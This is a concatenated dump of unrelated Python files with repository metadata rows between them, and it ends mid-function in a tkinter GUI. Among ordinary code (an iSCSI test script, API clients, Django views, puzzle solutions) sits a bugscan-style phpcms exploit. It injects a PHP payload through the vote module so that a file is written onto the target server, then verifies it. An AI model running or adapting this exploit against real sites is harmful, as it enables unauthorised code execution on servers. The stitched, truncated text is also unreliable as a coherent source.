else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip, test case failed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login passed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip, testcase passed" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("Negative testcase-iscsi volume %s login failed on the client with dummy iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
# for positive testcase
else:
###no iscsi volumes discovered
if iqnname==[]:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### some iscsi volumes discovered
else:
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --login | grep Login' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
### iscsi volume login successfull
if output[0] == "PASSED":
print "iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login passed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
#### if login successfull mount and copy some data
device = getoutput('iscsiadm -m session -P3 | grep \'Attached scsi disk\' | awk {\'print $4\'}')
device2 = (device[0].split('\n'))[0]
executeCmd('fdisk /dev/%s < fdisk_response_file' (device2))
executeCmd('mkfs.ext3 /dev/%s1' %(device2))
executeCmd('mount /dev/%s1 mount/%s' %(device2, config['voliSCSIMountpoint%d' %(x)]))
executeCmd('cp testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
output=executeCmd('diff testfile mount/%s' %(config['voliSCSIMountpoint%d' %(x)]))
if output[0] == "PASSED":
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["PASSED",""], startTime, endTime)
else:
endtime = ctime()
resultCollection("Creation of File on ISCSI Volume %s passed on the client with iqn and ip credentials" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### iscsi volume login unsuccessfull
else:
print "iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)])
endTime = ctime()
resultCollection("iscsi volume %s login failed on the client with iqn and ip" %(config['voliSCSIDatasetname%d' %(x)]),["FAILED",""], startTime, endTime)
### logout
output=executeCmd('iscsiadm -m node --targetname "%s" --portal "%s:3260" --logout | grep Logout' %(iqnname[0].strip(), config['voliSCSIIPAddress%d' %(x)]))
| [
"[email protected]"
] | |
3fccf4fa9600a4a3e7b07d4b28660e603bcef30e | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/triangle/0296cbe043e446b8b9365e20fb75c136.py | 18e84ab880631f7510539ae77e9524b0eda2b632 | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 621 | py | # represents a triangle
class Triangle(object):
_kinds=["equilateral","isosceles","scalene"]
def __init__(self,a,b,c):
if a<=0 or b<=0 or c<=0:
raise TriangleError("Triangles cannot have zero or negative side length.")
if a+b<=c or a+c<=b or b+c<=a:
raise TriangleError("Triangles must satisfy the triangle inequality.")
self.sides=sorted([a,b,c])
def kind(self):
return Triangle._kinds[len(set(self.sides))-1]
# some sort of error was encountered when constructing a Triangle
class TriangleError(Exception):
def __init__(self,message):
super(TriangleError,self).__init__(message)
| [
"[email protected]"
] | |
748f97751e80a2258b78d59ce4a378db9a54d1b5 | b743a6b89e3e7628963fd06d2928b8d1cdc3243c | /bpl_client/Client.py | c9143098c648f30df369d458d22b99d0e6d61a3a | [
"MIT"
] | permissive | DuneRoot/bpl-cli | 847248d36449181856e6cf34a18119cd9fc1b045 | 3272de85dd5e4b12ac5b2ad98bf1e971f3bf5c28 | refs/heads/master | 2020-03-25T17:42:06.339501 | 2019-02-20T19:20:26 | 2019-02-20T19:20:26 | 143,990,801 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | """
BPL Client
Usage:
bpl-cli network config new
bpl-cli network config use
bpl-cli network config show
bpl-cli network peers
bpl-cli network status
bpl-cli account create
bpl-cli account status <address>
bpl-cli account transactions <address>
bpl-cli account send <amount> <recipient>
bpl-cli account vote <username>
bpl-cli account delegate <username>
bpl-cli message sign <message>
bpl-cli message verify <message> <publicKey>
Options:
-h --help Show this screen.
--version Show version.
Help:
For help using this client, please see https://github.com/DuneRoot/bpl-cli
"""
from importlib import import_module
from functools import reduce
from docopt import docopt
import json
from bpl_client.helpers.Constants import COMMANDS_JSON
from bpl_client.helpers.Util import read_file
from bpl_client import __version__
class Client:
def __init__(self):
"""
Client Class.
Retrieves options from docopt. Options are then filtered using data stored in commands.json.
Command is then imported and instantiated.
"""
self._options = docopt(__doc__, version=__version__)
self._arguments = {
k: v for k, v in self._options.items()
if not isinstance(v, bool)
}
commands_json = json.loads(read_file(COMMANDS_JSON))
command = list(filter(lambda x: self._is_command(x["Conditions"]), commands_json))[0]
getattr(
import_module("bpl_client.commands.{0}".format(command["Module Identifier"])),
command["Class Identifier"]
)(self._arguments).run()
def _is_command(self, conditions):
return reduce(lambda x, y: x and y, map(lambda y: self._options[y], conditions))
| [
"[email protected]"
] | |
aa43f40b58364ba1f55d60b52c75f3e4b4bbfeb9 | 7136e5242793b620fa12e9bd15bf4d8aeb0bfe7a | /examples/adspygoogle/dfp/v201101/get_licas_by_statement.py | 9086f2f5d7006a77c1a7b578138725bf4db3479b | [
"Apache-2.0"
] | permissive | hockeyprincess/google-api-dfp-python | 534519695ffd26341204eedda7a8b50648f12ea9 | efa82a8d85cbdc90f030db9d168790c55bd8b12a | refs/heads/master | 2021-01-10T10:01:09.445419 | 2011-04-14T18:25:38 | 2011-04-14T18:25:38 | 52,676,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,266 | py | #!/usr/bin/python
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example gets all line item creative associations (LICA) for a given
line item id. The statement retrieves up to the maximum page size limit of 500.
To create LICAs, run create_licas.py."""
__author__ = '[email protected] (Stan Grinberg)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.append(os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle.dfp.DfpClient import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service. By default, the request is always made against
# the sandbox environment.
lica_service = client.GetLineItemCreativeAssociationService(
'https://sandbox.google.com', 'v201101')
# Set the id of the line item to get LICAs by.
line_item_id = 'INSERT_LINE_ITEM_ID_HERE'
# Create statement object to only select LICAs for the given line item id.
values = [{
'key': 'lineItemId',
'value': {
'xsi_type': 'NumberValue',
'value': line_item_id
}
}]
filter_statement = {'query': 'WHERE lineItemId = :lineItemId LIMIT 500',
'values': values}
# Get LICAs by statement.
licas = lica_service.GetLineItemCreativeAssociationsByStatement(
filter_statement)[0]['results']
# Display results.
for lica in licas:
print ('LICA with line item id \'%s\', creative id \'%s\', and status '
'\'%s\' was found.' % (lica['id'], lica['creativeId'], lica['status']))
print
print 'Number of results found: %s' % len(licas)
| [
"api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138"
] | api.sgrinberg@7990c6e4-1bfd-11df-85e6-9b4bd7dd5138 |
405974db9681a1efc9bb65d55fa0ae64ee33d230 | 94470cf07f402b1c7824e92a852cd3203f94ac4a | /polls/apiviews.py | 6f6ca88b9da4638cbf0f4888e4305f24fa9ffee5 | [] | no_license | jbeltranleon/pollsapi_django_rest | c509bf0b0c1e2db870ed8a4aaa1647bf74c5f8cd | 0855820541064ffd77dbd1c6e77f695d4f18e517 | refs/heads/master | 2020-04-14T17:55:02.364183 | 2019-01-04T16:01:46 | 2019-01-04T16:01:46 | 163,999,126 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,203 | py | from rest_framework import generics
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.response import Response
from .models import Poll, Choice
from .serializers import PollSerializer, ChoiceSerializer,\
VoteSerializer
class PollList(generics.ListCreateAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class PollDetail(generics.RetrieveDestroyAPIView):
queryset = Poll.objects.all()
serializer_class = PollSerializer
class ChoiceList(generics.ListCreateAPIView):
def get_queryset(self):
queryset = Choice.objects.filter(poll_id=self.kwargs["pk"])
return queryset
serializer_class = ChoiceSerializer
class CreateVote(APIView):
def post(self, request, pk, choice_pk):
voted_by = request.data.get("voted_by")
data = {'choice': choice_pk, 'poll': pk, 'voted_by': voted_by}
serializer = VoteSerializer(data=data)
if serializer.is_valid():
vote = serializer.save()
return Response(serializer.data, status=status.HTTP_201_CREATED)
else:
return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) | [
"[email protected]"
] | |
cdf669514aaf2c1d7c33248746135d7b0232f29f | 184ab7b1f5d6c4a4382cf4ffcf50bbad0f157ef1 | /library/aht10/aht10_example.py | 46df77a8a71666025fda1409a3c5b7ebdbed9497 | [] | no_license | RT-Thread/mpy-snippets | fdd257bb9f44cdc92e52cd39cdc88a57d736fb26 | 9296d559da275f51845cb9c2f8e2010f66f72cc1 | refs/heads/master | 2023-06-14T02:20:05.449559 | 2020-06-03T02:34:47 | 2020-06-03T02:35:19 | 198,854,793 | 28 | 18 | null | 2020-05-06T11:32:46 | 2019-07-25T15:14:56 | Python | UTF-8 | Python | false | false | 517 | py | from machine import I2C, Pin
from aht10 import AHT10
PIN_CLK = 54 # PD6, get the pin number from get_pin_number.py
PIN_SDA = 33 # PC1
clk = Pin(("clk", PIN_CLK), Pin.OUT_OD) # Select the PIN_CLK as the clock
sda = Pin(("sda", PIN_SDA), Pin.OUT_OD) # Select the PIN_SDA as the data line
i2c = I2C(-1, clk, sda, freq=100000)
sensor = AHT10(i2c)
sensor.sensor_init()
sensor.is_calibration_enabled()
print("current temp: %.2f "%sensor.read_temperature())
print("current humi: %.2f %%"%sensor.read_humidity())
| [
"[email protected]"
] | |
e2e44ffd1b8897513aaba446dd704ac14b2c5945 | 35dbd536a17d7127a1dd1c70a2903ea0a94a84c2 | /src/sentry_plugins/sessionstack/client.py | 2c50f1bafe960bbe0331c77cff05e234168642de | [
"Apache-2.0",
"BUSL-1.1"
] | permissive | nagyist/sentry | efb3ef642bd0431990ca08c8296217dabf86a3bf | d9dd4f382f96b5c4576b64cbf015db651556c18b | refs/heads/master | 2023-09-04T02:55:37.223029 | 2023-01-09T15:09:44 | 2023-01-09T15:09:44 | 48,165,782 | 0 | 0 | BSD-3-Clause | 2022-12-16T19:13:54 | 2015-12-17T09:42:42 | Python | UTF-8 | Python | false | false | 4,683 | py | import requests
from sentry.http import safe_urlopen
from sentry.utils import json
from .utils import add_query_params, get_basic_auth, remove_trailing_slashes
ACCESS_TOKEN_NAME = "Sentry"
DEFAULT_SENTRY_SOURCE = "sentry"
API_URL = "https://api.sessionstack.com"
PLAYER_URL = "https://app.sessionstack.com/player"
WEBSITES_ENDPOINT = "/v1/websites/{}"
SESSION_ENDPOINT = "/v1/websites/{}/sessions/{}"
ACCESS_TOKENS_ENDPOINT = "/v1/websites/{}/sessions/{}/access_tokens"
SESSION_URL_PATH = "/#/sessions/"
MILLISECONDS_BEFORE_EVENT = 5000
class SessionStackClient:
def __init__(self, account_email, api_token, website_id, **kwargs):
self.website_id = website_id
api_url = kwargs.get("api_url") or API_URL
self.api_url = remove_trailing_slashes(api_url)
player_url = kwargs.get("player_url") or PLAYER_URL
self.player_url = remove_trailing_slashes(player_url)
self.request_headers = {
"Authorization": get_basic_auth(account_email, api_token),
"Content-Type": "application/json",
}
def validate_api_access(self):
website_endpoint = WEBSITES_ENDPOINT.format(self.website_id)
try:
response = self._make_request(website_endpoint, "GET")
except requests.exceptions.ConnectionError:
raise InvalidApiUrlError
if response.status_code == requests.codes.UNAUTHORIZED:
raise UnauthorizedError
elif response.status_code == requests.codes.BAD_REQUEST:
raise InvalidWebsiteIdError
elif response.status_code == requests.codes.NOT_FOUND:
raise InvalidApiUrlError
response.raise_for_status()
def get_session_url(self, session_id, event_timestamp):
player_url = self.player_url + SESSION_URL_PATH + session_id
query_params = {}
query_params["source"] = DEFAULT_SENTRY_SOURCE
access_token = self._get_access_token(session_id)
if access_token is not None:
query_params["access_token"] = access_token
if event_timestamp is not None:
start_timestamp = self._get_session_start_timestamp(session_id)
if start_timestamp is not None:
pause_at = event_timestamp - start_timestamp
play_from = pause_at - MILLISECONDS_BEFORE_EVENT
query_params["pause_at"] = pause_at
query_params["play_from"] = play_from
return add_query_params(player_url, query_params)
def _get_access_token(self, session_id):
access_token = self._create_access_token(session_id)
if not access_token:
access_token = self._get_existing_access_token(session_id)
return access_token
def _get_existing_access_token(self, session_id):
response = self._make_access_tokens_request(session_id, "GET")
if response.status_code != requests.codes.OK:
return None
access_tokens = json.loads(response.content).get("data")
for token in access_tokens:
token_name = token.get("name")
if token_name == ACCESS_TOKEN_NAME:
return token.get("access_token")
return None
def _create_access_token(self, session_id):
response = self._make_access_tokens_request(
session_id=session_id, method="POST", body={"name": ACCESS_TOKEN_NAME}
)
if response.status_code != requests.codes.OK:
return None
return json.loads(response.content).get("access_token")
def _make_access_tokens_request(self, session_id, method, **kwargs):
access_tokens_endpoint = self._get_access_tokens_endpoint(session_id)
return self._make_request(access_tokens_endpoint, method, **kwargs)
def _get_access_tokens_endpoint(self, session_id):
return ACCESS_TOKENS_ENDPOINT.format(self.website_id, session_id)
def _get_session_start_timestamp(self, session_id):
endpoint = SESSION_ENDPOINT.format(self.website_id, session_id)
response = self._make_request(endpoint, "GET")
if response.status_code == requests.codes.OK:
return json.loads(response.content).get("client_start")
def _make_request(self, endpoint, method, **kwargs):
url = self.api_url + endpoint
request_kwargs = {"method": method, "headers": self.request_headers}
body = kwargs.get("body")
if body:
request_kwargs["json"] = body
return safe_urlopen(url, **request_kwargs)
class UnauthorizedError(Exception):
pass
class InvalidWebsiteIdError(Exception):
pass
class InvalidApiUrlError(Exception):
pass
| [
"[email protected]"
] | |
3a4928e43a8d2eb7a9e58b5e4c3c04eee176b3f5 | 0798277f2706998ab80442ac931579eb47f676e5 | /bin/metric-markdown | ed615b4e0809a60c37d486fe5df8f258f20d47d9 | [
"Apache-2.0"
] | permissive | isabella232/pulse-api-cli | 49ed38b0694ab289802f69ee6df4911cf3378e3f | b01ca65b442eed19faac309c9d62bbc3cb2c098f | refs/heads/master | 2023-03-18T00:23:15.295727 | 2016-05-13T15:44:08 | 2016-05-13T15:44:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | #!/usr/bin/env python
#
# Copyright 2015 BMC Software, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from boundary import MetricMarkdown
"""
Reads the plugin.json manifest file looks up the definition and then outputs a markdown table
"""
if __name__ == "__main__":
c = MetricMarkdown()
c.execute()
| [
"[email protected]"
] | ||
95d38eb622dd57ea6cf2bba55e5202edeb6e0e3b | 43ff15a7989576712d0e51f0ed32e3a4510273c0 | /tools/pocs/bugscan/exp_679.py | 798104fb95f83ba1ff04752dfd711df064cc3623 | [] | no_license | v1cker/kekescan | f2b51d91a9d6496e2cdc767eb6a600171f513449 | 3daa1775648439ba9e0003a376f90b601820290e | refs/heads/master | 2020-09-19T16:26:56.522453 | 2017-06-15T02:55:24 | 2017-06-15T02:55:24 | 94,495,007 | 6 | 3 | null | null | null | null | UTF-8 | Python | false | false | 1,954 | py | # -*- coding: utf-8 -*-
from dummy import *
from miniCurl import Curl
curl = Curl()
# !/usr/bin/dev python
# -*- coding:utf-8 -*-
"""
reference:
http://www.wooyun.org/bugs/wooyun-2015-0104157
http://www.beebeeto.com/pdb/poc-2015-0086/
"""
import re
import urllib
import urllib2
import base64
import random
def get_vote_links(args):
vul_url = args
vote_url = '%sindex.php?m=vote' % vul_url
code, head, res, _, _ = curl.curl(vote_url)
ids = []
for miter in re.finditer(r'<a href=.*?subjectid=(?P<id>\d+)', res, re.DOTALL):
ids.append(miter.group('id'))
if len(ids) == 0:
return None
return list(set(ids))
def assign(service, args):
if service == 'phpcms':
return True, args
pass
def audit(args):
vul_url = args
ids = get_vote_links(args)
file_name = 'w2x5Tt_%s.php' % random.randint(1,3000)
base64_name = base64.b64encode(file_name)
if ids:
for i in ids:
exploit_url = '%sindex.php?m=vote&c=index&a=post&subjectid=%s&siteid=1' % (vul_url, i)
payload = {'subjectid': 1,
'radio[]': ');fputs(fopen(base64_decode(%s),w),"vulnerable test");' % base64_name}
post_data = urllib.urlencode(payload)
code,head,body,_,_=curl.curl('-d "%s" %s' % (post_data, exploit_url))
if code==200:
verify_url = '%sindex.php?m=vote&c=index&a=result&subjectid=%s&siteid=1' % (vul_url, i)
code,head,body,_,_=curl.curl(verify_url)
if code==200:
shell_url = '%s%s' % (vul_url, file_name)
code, head, res, _, _ = curl.curl(shell_url)
if code == 200 and 'vulnerable test' in res:
security_hole(vul_url)
if __name__ == "__main__":
from dummy import *
audit(assign('phpcms', 'http://www.jkb.com.cn/')[1]) | [
"[email protected]"
] | |
4aff36fdb71b2bbc4fd29e2773506848f06a1fd6 | 8a7d5d67052892dd5d2a748282958f6244d963c6 | /google-cloud-sdk/lib/surface/app/domain_mappings/delete.py | 32842caf145b27ecec1a4e5410e7656b9643a037 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | KisleK/capstone | 7d1d622bd5ca4cd355302778a02dc6d32ed00c88 | fcef874f4fcef4b74ca016ca7bff92677673fded | refs/heads/master | 2021-07-04T03:29:44.888340 | 2017-07-24T16:16:33 | 2017-07-24T16:16:33 | 93,699,673 | 0 | 2 | null | 2020-07-24T22:44:28 | 2017-06-08T02:34:17 | Python | UTF-8 | Python | false | false | 1,812 | py | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Surface for deleting an App Engine domain mapping."""
from googlecloudsdk.api_lib.app.api import appengine_domains_api_client as api_client
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.app import flags
from googlecloudsdk.core import log
from googlecloudsdk.core.console import console_io
class Delete(base.DeleteCommand):
"""Deletes a specified domain mapping."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
To delete an App Engine domain mapping, run:
$ {command} '*.example.com'
""",
}
@staticmethod
def Args(parser):
flags.DOMAIN_FLAG.AddToParser(parser)
def Run(self, args):
console_io.PromptContinue(
prompt_string=('Deleting mapping [{0}]. This will stop your app from'
' serving from this domain.'.format(args.domain)),
cancel_on_no=True)
if self.ReleaseTrack() == base.ReleaseTrack.ALPHA:
client = api_client.AppengineDomainsApiAlphaClient.GetApiClient()
else:
client = api_client.AppengineDomainsApiClient.GetApiClient()
client.DeleteDomainMapping(args.domain)
log.DeletedResource(args.domain)
| [
"[email protected]"
] | |
7f7bc5dacb84f4e18c258d76fd91a9bb8cc3af3b | 54f352a242a8ad6ff5516703e91da61e08d9a9e6 | /Source Codes/CodeJamData/12/23/12.py | da0396d4cf15e8267cd6d9041247bc41bc9c3b63 | [] | no_license | Kawser-nerd/CLCDSA | 5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb | aee32551795763b54acb26856ab239370cac4e75 | refs/heads/master | 2022-02-09T11:08:56.588303 | 2022-01-26T18:53:40 | 2022-01-26T18:53:40 | 211,783,197 | 23 | 9 | null | null | null | null | UTF-8 | Python | false | false | 1,511 | py | # -*- coding:utf-8 -*-
import os, itertools
curr_dir = os.path.dirname(os.path.abspath(__file__))
srcfilename = os.path.join(curr_dir, 'C-large.in')
dstfilename = os.path.join(curr_dir, 'output.txt')
def solve(numbers_):
numbers = sorted(numbers_)
memory = dict((k, [k]) for k in numbers)
for r in xrange(2, len(numbers)):
combinations = itertools.combinations(numbers, r)
for combination in combinations:
s = sum(combination)
if s in memory:
r1 = memory[s]
r2 = combination
return r1, r2
memory[s] = combination
return 'Impossible'
if __name__ == '__main__':
with open(srcfilename, 'rb') as inp:
with open(dstfilename, 'wb') as outp:
lines = inp.readlines()
count = int(lines.pop(0))
outlines = []
for i in xrange(count):
line = lines[i]
numbers = [int(number) for number in line.split(' ')]
numbers.pop(0)
result = solve(numbers)
if result == 'Impossible':
outlines.append('Case #%d: Impossible\n' % (i+1,))
else:
r1, r2 = result
outlines.append('Case #%d:\n' % (i+1,))
outlines.append('%s\n' % ' '.join(['%d' % r1i for r1i in r1]))
outlines.append('%s\n' % ' '.join(['%d' % r2i for r2i in r2]))
outp.writelines(outlines)
| [
"[email protected]"
] | |
0716ae0a297c478efb4cabc07dd95d1ade9b0765 | 0c85cba348e9abace4f16dfb70531c70175dac68 | /cloudroast/networking/networks/api/security_groups/test_security_groups_quotas.py | 711c5f5a1d12b995b33e7c5f496a7e31ad6fa4c0 | [
"Apache-2.0"
] | permissive | RULCSoft/cloudroast | 31157e228d1fa265f981ec82150255d4b7876af2 | 30f0e64672676c3f90b4a582fe90fac6621475b3 | refs/heads/master | 2020-04-04T12:20:59.388355 | 2018-11-02T21:32:27 | 2018-11-02T21:32:27 | 155,923,262 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,301 | py | """
Copyright 2015 Rackspace
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cafe.drivers.unittest.decorators import tags
from cloudcafe.networking.networks.extensions.security_groups_api.constants \
import SecurityGroupsErrorTypes, SecurityGroupsResponseCodes
from cloudroast.networking.networks.fixtures \
import NetworkingSecurityGroupsFixture
class SecurityGroupsQuotasTest(NetworkingSecurityGroupsFixture):
@classmethod
def setUpClass(cls):
"""Setting up test data"""
super(SecurityGroupsQuotasTest, cls).setUpClass()
# Setting up
cls.expected_secgroup = cls.get_expected_secgroup_data()
cls.expected_secgroup.name = 'test_secgroup_quotas'
def tearDown(self):
self.secGroupCleanUp()
super(SecurityGroupsQuotasTest, self).tearDown()
@tags('quotas')
def test_rules_per_group(self):
"""
@summary: Testing security rules quota per group
"""
secgroup = self.create_test_secgroup(self.expected_secgroup)
expected_secrule = self.get_expected_secrule_data()
expected_secrule.security_group_id = secgroup.id
rules_per_group = self.sec.config.max_rules_per_secgroup
self.create_n_security_rules_per_group(expected_secrule,
rules_per_group)
msg = ('Successfully created the expected security rules per group '
'allowed by the quota of {0}').format(rules_per_group)
self.fixture_log.debug(msg)
# Checking the quota is enforced
request_kwargs = dict(
security_group_id=expected_secrule.security_group_id,
raise_exception=False)
resp = self.sec.behaviors.create_security_group_rule(**request_kwargs)
neg_msg = ('(negative) Creating a security rule over the group quota'
' of {0}').format(rules_per_group)
self.assertNegativeResponse(
resp=resp, status_code=SecurityGroupsResponseCodes.CONFLICT,
msg=neg_msg, delete_list=self.delete_secgroups,
error_type=SecurityGroupsErrorTypes.OVER_QUOTA)
@tags('quotas')
def test_groups_per_tenant(self):
"""
@summary: Testing security groups quota per tenant
"""
groups_per_tenant = self.sec.config.max_secgroups_per_tenant
self.create_n_security_groups(self.expected_secgroup,
groups_per_tenant)
# Checking the quota is enforced
request_kwargs = dict(
name=self.expected_secgroup.name,
description=self.expected_secgroup.description,
raise_exception=False)
resp = self.sec.behaviors.create_security_group(**request_kwargs)
neg_msg = ('(negative) Creating a security group over the tenant quota'
' of {0}').format(groups_per_tenant)
status_code = SecurityGroupsResponseCodes.CONFLICT
error_type = SecurityGroupsErrorTypes.OVER_QUOTA
self.assertNegativeResponse(
resp=resp, status_code=status_code, msg=neg_msg,
delete_list=self.delete_secgroups,
error_type=error_type)
@tags('quotas')
def test_rules_per_tenant(self):
"""
@summary: Testing security rules quota per tenant
"""
expected_secrule = self.get_expected_secrule_data()
groups_per_tenant = self.sec.config.max_secgroups_per_tenant
rules_per_tenant = self.sec.config.max_rules_per_tenant
rules_per_group = rules_per_tenant / groups_per_tenant
secgroups = self.create_n_security_groups_w_n_rules(
self.expected_secgroup, expected_secrule, groups_per_tenant,
rules_per_group)
msg = ('Successfully created the expected security rules per tenant '
'allowed by the quota of {0}').format(rules_per_tenant)
self.fixture_log.debug(msg)
# Checking the quota is enforced
request_kwargs = dict(
security_group_id=secgroups[0].id,
raise_exception=False)
resp = self.sec.behaviors.create_security_group_rule(**request_kwargs)
neg_msg = ('(negative) Creating a security rule over the tenant quota'
' of {0}').format(rules_per_tenant)
self.assertNegativeResponse(
resp=resp, status_code=SecurityGroupsResponseCodes.CONFLICT,
msg=neg_msg, delete_list=self.delete_secgroups,
error_type=SecurityGroupsErrorTypes.OVER_QUOTA)
def create_n_security_groups_w_n_rules(self, expected_secgroup,
expected_secrule, groups_num,
rules_num):
"""
@summary: Creating n security groups with n rules
"""
secgroups = self.create_n_security_groups(expected_secgroup,
groups_num)
for group in secgroups:
expected_secrule.security_group_id = group.id
self.create_n_security_rules_per_group(expected_secrule, rules_num)
return secgroups
def create_n_security_groups(self, expected_secgroup, num):
"""
@summary: Creating n security groups
"""
secgroups = []
for x in range(num):
log_msg = 'Creating security group {0}'.format(x + 1)
self.fixture_log.debug(log_msg)
name = 'security_test_group_n_{0}'.format(x + 1)
expected_secgroup.name = name
secgroup = self.create_test_secgroup(expected_secgroup)
secgroups.append(secgroup)
msg = 'Successfully created {0} security groups'.format(num)
self.fixture_log.debug(msg)
return secgroups
def create_n_security_rules_per_group(self, expected_secrule, num):
"""
@summary: Creating n security rules within a security group and
verifying they are created successfully
"""
request_kwargs = dict(
security_group_id=expected_secrule.security_group_id,
raise_exception=False)
for x in range(num):
log_msg = 'Creating rule {0}'.format(x + 1)
self.fixture_log.debug(log_msg)
resp = self.sec.behaviors.create_security_group_rule(
**request_kwargs)
# Fail the test if any failure is found
self.assertFalse(resp.failures)
secrule = resp.response.entity
# Check the Security Group Rule response
self.assertSecurityGroupRuleResponse(expected_secrule, secrule)
msg = ('Successfully created {0} security rules at security group '
'{1}').format(num, expected_secrule.security_group_id)
self.fixture_log.debug(msg)
| [
"[email protected]"
] | |
d9f0bd32c021cff6d85d2b4c86f7c6a119a3be14 | 0912be54934d2ac5022c85151479a1460afcd570 | /Ch07_Code/GUI_MySQL.py | cf54d12400d1045cffa7dcdeaa05f864343ff849 | [
"MIT"
] | permissive | actuarial-tools/Python-GUI-Programming-Cookbook-Third-Edition | 6d9d155663dda4450d0b180f43bab46c24d18d09 | 8c9fc4b3bff8eeeda7f18381faf33c19e98a14fe | refs/heads/master | 2023-01-31T13:11:34.315477 | 2020-12-15T08:21:06 | 2020-12-15T08:21:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,876 | py | '''
Created on May 29, 2019
@author: Burkhard
'''
#======================
# imports
#======================
import tkinter as tk
from tkinter import ttk
from tkinter import scrolledtext
from tkinter import Menu
from tkinter import Spinbox
from Ch07_Code.ToolTip import ToolTip
from threading import Thread
from time import sleep
from queue import Queue
from tkinter import filedialog as fd
from os import path, makedirs
from tkinter import messagebox as mBox
from Ch07_Code.GUI_MySQL_class import MySQL
# Module level GLOBALS
GLOBAL_CONST = 42
fDir = path.dirname(__file__)
netDir = fDir + '\\Backup'
if not path.exists(netDir):
makedirs(netDir, exist_ok = True)
WIDGET_LABEL = ' Widgets Frame '
#===================================================================
class OOP():
def __init__(self):
# Create instance
self.win = tk.Tk()
# Add a title
self.win.title("Python GUI")
# Disable resizing the window
self.win.resizable(0,0)
# Create a Queue
self.guiQueue = Queue()
self.createWidgets()
# populate Tab 2 Entries
self.defaultFileEntries()
# create MySQL instance
self.mySQL = MySQL()
def defaultFileEntries(self):
self.fileEntry.delete(0, tk.END)
